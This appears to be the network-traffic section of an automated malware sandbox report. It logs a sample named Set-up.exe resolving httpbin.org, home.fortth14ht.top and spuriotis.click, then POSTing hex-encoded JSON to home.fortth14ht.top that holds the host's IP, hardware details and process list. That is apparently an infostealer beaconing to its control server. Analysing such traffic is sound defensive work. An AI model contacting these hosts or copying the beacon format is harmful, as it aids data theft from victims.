                                                                                                                                                                        Dec 28, 2024 09:34:53.949522972 CET49754443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:53.949548006 CET44349754172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:53.982569933 CET49760443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:53.982620955 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:53.982685089 CET49760443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:53.983365059 CET49760443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:53.983381033 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:55.202208996 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:55.202332973 CET49760443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:55.203649044 CET49760443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:55.203660011 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:55.204632044 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:55.210870981 CET49760443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:55.210890055 CET49760443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:55.210968971 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:55.974940062 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:55.975083113 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:55.975151062 CET49760443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:55.975166082 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:55.975266933 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:55.975320101 CET49760443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:55.975327969 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:55.977255106 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:55.977313042 CET49760443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:55.977320910 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:55.985682964 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:55.985755920 CET49760443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:55.985764027 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:55.994173050 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:55.994230032 CET49760443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:55.994239092 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:56.044862986 CET49760443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:56.094077110 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:56.138544083 CET49760443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:56.166352987 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:56.170109987 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:56.170197964 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:56.170208931 CET49760443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:56.170226097 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:56.170281887 CET49760443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:56.170301914 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:56.170447111 CET49760443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:56.170455933 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:56.170475006 CET49760443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:56.170483112 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:56.170490980 CET44349760172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:56.291028976 CET49766443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:56.291084051 CET44349766172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:56.291178942 CET49766443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:56.291507006 CET49766443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:56.291522026 CET44349766172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:57.558350086 CET44349766172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:57.558546066 CET49766443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:57.559833050 CET49766443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:57.559849024 CET44349766172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:57.560086966 CET44349766172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:57.561347008 CET49766443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:57.561522961 CET49766443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:57.561553001 CET44349766172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:58.478024960 CET44349766172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:58.478127956 CET44349766172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:58.478188038 CET49766443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:58.478373051 CET49766443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:58.478390932 CET44349766172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:58.563585997 CET49772443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:58.563632011 CET44349772172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:58.563719034 CET49772443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:58.564079046 CET49772443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:58.564090967 CET44349772172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:59.828459024 CET44349772172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:59.828547955 CET49772443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:59.830120087 CET49772443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:59.830132961 CET44349772172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:59.830460072 CET44349772172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:59.831765890 CET49772443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:59.831952095 CET49772443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:59.831984997 CET44349772172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:59.832051992 CET49772443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:34:59.879329920 CET44349772172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:00.633706093 CET44349772172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:00.633963108 CET44349772172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:00.634027004 CET49772443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:00.638211966 CET49772443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:00.638233900 CET44349772172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:00.877398014 CET49778443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:00.877451897 CET44349778172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:00.877542973 CET49778443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:00.877854109 CET49778443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:00.877870083 CET44349778172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:02.092293024 CET44349778172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:02.092410088 CET49778443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:02.094197989 CET49778443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:02.094203949 CET44349778172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:02.094554901 CET44349778172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:02.095866919 CET49778443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:02.096034050 CET49778443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:02.096071005 CET44349778172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:02.096144915 CET49778443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:02.096153975 CET44349778172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:03.061484098 CET44349778172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:03.061614037 CET44349778172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:03.061664104 CET49778443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:03.061784029 CET49778443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:03.061793089 CET44349778172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:03.177155972 CET49784443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:03.177196980 CET44349784172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:03.177297115 CET49784443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:03.177630901 CET49784443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:03.177649975 CET44349784172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:04.435065985 CET44349784172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:04.435142040 CET49784443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:04.436579943 CET49784443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:04.436592102 CET44349784172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:04.436829090 CET44349784172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:04.438098907 CET49784443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:04.438184977 CET49784443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:04.438189983 CET44349784172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:05.322134018 CET44349784172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:05.322448969 CET44349784172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:05.322541952 CET49784443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:05.322663069 CET49784443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:05.322693110 CET44349784172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:05.719917059 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:05.719973087 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:05.720051050 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:05.720340014 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:05.720355034 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:06.931282997 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:06.931421041 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:06.932723999 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:06.932734966 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:06.932971954 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:06.934169054 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:06.934894085 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:06.934923887 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:06.935031891 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:06.935060978 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:06.935193062 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:06.935230970 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:06.935367107 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:06.935394049 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:06.935554028 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:06.935575962 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:06.935715914 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:06.935743093 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:06.935750008 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:06.935765028 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:06.935861111 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:06.935877085 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:06.935889959 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:06.936011076 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:06.936037064 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:06.979342937 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:06.979609013 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:06.979651928 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:06.979667902 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:06.979686975 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:06.979706049 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:06.979712963 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:06.979729891 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:06.979733944 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:09.209280014 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:09.209376097 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:09.209465027 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:09.209661961 CET49790443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:09.209676027 CET44349790172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:09.221451998 CET49801443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:09.221487045 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:09.221573114 CET49801443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:09.221878052 CET49801443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:09.221889973 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:10.480552912 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:10.480730057 CET49801443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:10.521282911 CET49801443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:10.521305084 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:10.521653891 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:10.540080070 CET49801443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:10.540098906 CET49801443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:10.540169001 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:11.270683050 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:11.270733118 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:11.270766973 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:11.270790100 CET49801443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:11.270803928 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:11.270842075 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:11.270847082 CET49801443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:11.270852089 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:11.270941019 CET49801443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:11.270947933 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:11.278904915 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:11.278944016 CET49801443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:11.278959036 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:11.287334919 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:11.287390947 CET49801443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:11.287400961 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:11.299906015 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:11.299997091 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:11.300043106 CET49801443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:11.300043106 CET49801443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:11.300846100 CET49801443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:11.300846100 CET49801443192.168.2.7172.67.128.184
                                                                                                                                                                        Dec 28, 2024 09:35:11.300862074 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:11.300870895 CET44349801172.67.128.184192.168.2.7
                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Dec 28, 2024 09:34:27.812144041 CET5763953192.168.2.71.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:34:27.813307047 CET5763953192.168.2.71.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:34:27.953545094 CET53576391.1.1.1192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:28.100851059 CET53576391.1.1.1192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:35.386193037 CET6110853192.168.2.71.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:34:35.527067900 CET53611081.1.1.1192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.061197996 CET6110953192.168.2.71.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:34:43.061249971 CET6110953192.168.2.71.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:34:43.204163074 CET53611091.1.1.1192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:43.204178095 CET53611091.1.1.1192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:47.253734112 CET5108553192.168.2.71.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:34:47.253797054 CET5108553192.168.2.71.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:34:47.393630028 CET53510851.1.1.1192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:47.393757105 CET53510851.1.1.1192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:48.889461994 CET5108753192.168.2.71.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:34:48.889462948 CET5108753192.168.2.71.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:34:49.029468060 CET53510871.1.1.1192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:49.029480934 CET53510871.1.1.1192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:34:51.602408886 CET5138753192.168.2.71.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:34:51.746069908 CET53513871.1.1.1192.168.2.7
                                                                                                                                                                        Dec 28, 2024 09:35:07.077642918 CET5154553192.168.2.71.1.1.1
                                                                                                                                                                        Dec 28, 2024 09:35:07.218135118 CET53515451.1.1.1192.168.2.7
                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                        Dec 28, 2024 09:34:27.812144041 CET192.168.2.71.1.1.10x4709Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:34:27.813307047 CET192.168.2.71.1.1.10xd121Standard query (0)httpbin.org28IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:34:35.386193037 CET192.168.2.71.1.1.10x9f69Standard query (0)yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVnA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:34:43.061197996 CET192.168.2.71.1.1.10xe8fbStandard query (0)home.fortth14ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:34:43.061249971 CET192.168.2.71.1.1.10x4797Standard query (0)home.fortth14ht.top28IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:34:47.253734112 CET192.168.2.71.1.1.10x6c58Standard query (0)home.fortth14ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:34:47.253797054 CET192.168.2.71.1.1.10xb454Standard query (0)home.fortth14ht.top28IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:34:48.889461994 CET192.168.2.71.1.1.10xd94dStandard query (0)home.fortth14ht.topA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:34:48.889462948 CET192.168.2.71.1.1.10x4f9cStandard query (0)home.fortth14ht.top28IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:34:51.602408886 CET192.168.2.71.1.1.10x90beStandard query (0)spuriotis.clickA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:35:07.077642918 CET192.168.2.71.1.1.10xa9a1Standard query (0)spuriotis.clickA (IP address)IN (0x0001)false
                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                        Dec 28, 2024 09:34:28.100851059 CET1.1.1.1192.168.2.70x4709No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:34:28.100851059 CET1.1.1.1192.168.2.70x4709No error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:34:35.527067900 CET1.1.1.1192.168.2.70x9f69Name error (3)yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVnnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:34:43.204178095 CET1.1.1.1192.168.2.70xe8fbNo error (0)home.fortth14ht.top194.87.58.92A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:34:47.393630028 CET1.1.1.1192.168.2.70x6c58No error (0)home.fortth14ht.top194.87.58.92A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:34:49.029480934 CET1.1.1.1192.168.2.70xd94dNo error (0)home.fortth14ht.top194.87.58.92A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:34:51.746069908 CET1.1.1.1192.168.2.70x90beNo error (0)spuriotis.click172.67.128.184A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:34:51.746069908 CET1.1.1.1192.168.2.70x90beNo error (0)spuriotis.click104.21.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:35:07.218135118 CET1.1.1.1192.168.2.70xa9a1No error (0)spuriotis.click104.21.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                        Dec 28, 2024 09:35:07.218135118 CET1.1.1.1192.168.2.70xa9a1No error (0)spuriotis.click172.67.128.184A (IP address)IN (0x0001)false
                                                                                                                                                                        • httpbin.org
                                                                                                                                                                        • spuriotis.click
                                                                                                                                                                        • home.fortth14ht.top
                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        0192.168.2.749726194.87.58.92807224C:\Users\user\AppData\Local\Temp\Set-up.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        Dec 28, 2024 09:34:43.327140093 CET12360OUTPOST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1
                                                                                                                                                                        Host: home.fortth14ht.top
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                        Content-Length: 444328
                                                                                                                                                                        Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 30 37 35 36 36 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
